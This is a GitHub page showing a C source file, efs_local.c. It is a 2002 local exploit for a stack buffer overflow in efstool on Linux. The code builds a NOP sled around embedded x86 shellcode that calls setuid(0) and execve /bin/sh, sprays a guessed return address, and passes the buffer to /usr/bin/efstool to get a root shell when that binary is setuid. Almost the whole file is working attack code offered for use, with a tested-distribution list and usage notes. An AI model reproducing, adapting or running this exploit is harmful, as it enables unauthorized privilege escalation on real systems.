-
Notifications
You must be signed in to change notification settings - Fork 97
/
Copy pathefs_local.c
97 lines (78 loc) · 2.59 KB
/
efs_local.c
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
/* efs_local.c - efstool local stack-based exploit
*
* Simple buffer overflow bug in efstool under linux, will
* spawn a user shell and a root shell if efstool binary
* is setuid (chmod 4755) and owned by root.
*
* - Gentoo Linux 1.4-rc1 (tested and works)
* - RedHat Linux 8.0 (tested and works)
* - RedHat Linux 7.3 (not tested)
* - RedHat Linux 7.2 (not tested)
* - Slackware Linux 8.1 (tested and works)
* - Slackware Linux 8.0 (tested and works, but change path)
*
* The list is getting long, think most of the major linux
* and/or *BSD's are affected. If you want to try out this
* on *BSD you have to replace the shellcode.
*
*
* Created: 2002-12-29 by N.Kursu (kursu at linux dot se)
* Release: v0.8
*
* * Use this on your own risk and dont blame me if *
* * your life gets messed up! *
*
* Greetings to kozmic, for giveing me a shell on his "hack me"
* RedHat Linux 8.0 box and testing out Gentoo 1.4rc1.
*/
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#define NOP 0x90
#define BSIZE 3000
#define ERROR -1
#define PPATH "/usr/bin/efstool"
char shellcode[] = "\x31\xc0\x31\xdb\xb0\x17\xcd\x80\xeb\x1f\x5e\x89\x76"
"\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3"
"\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40"
"\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh";
unsigned long get_esp(void) {
__asm__("movl %esp, %eax");
}
void usage(char *cmd) {
fprintf(stderr, "\n* Efstool local (user/root) exploit by kursu *\n");
fprintf(stderr, "==============================================\n");
fprintf(stderr, "An offset around 2000 should work, it did for\n");
fprintf(stderr, "me under Slackware Linux 8.1.\n");
fprintf(stderr, "\n\nUsage: %s <offset>\n\n", cmd);
exit(ERROR);
}
int main(int argc, char *argv[]) {
int i, off, nop = NOP;
long esp, ret, *ret_ptr;
char *buffer, *buffer_ptr;
if(argc<2) { usage(argv[0]); }
off = atoi(argv[1]);
esp = get_esp();
ret = esp-off;
if(!(buffer = (char *)malloc(BSIZE))) {
fprintf(stderr, "\nCant allocate memory!\n");
exit(ERROR);
}
buffer_ptr = buffer;
ret_ptr = (long *)buffer_ptr;
for(i = 0; i < BSIZE; i+=4) {
*(ret_ptr++) = ret;
}
for(i = 0; i < BSIZE/2; i++) {
buffer[i] = nop;
}
buffer_ptr = buffer + ((BSIZE/2) - (strlen(shellcode)/2));
for(i = 0; i < strlen(shellcode); i++) {
*(buffer_ptr++) = shellcode[i];
}
buffer[BSIZE-1] = '\0';
execl(PPATH, "efstool", buffer, 0);
return 0;
}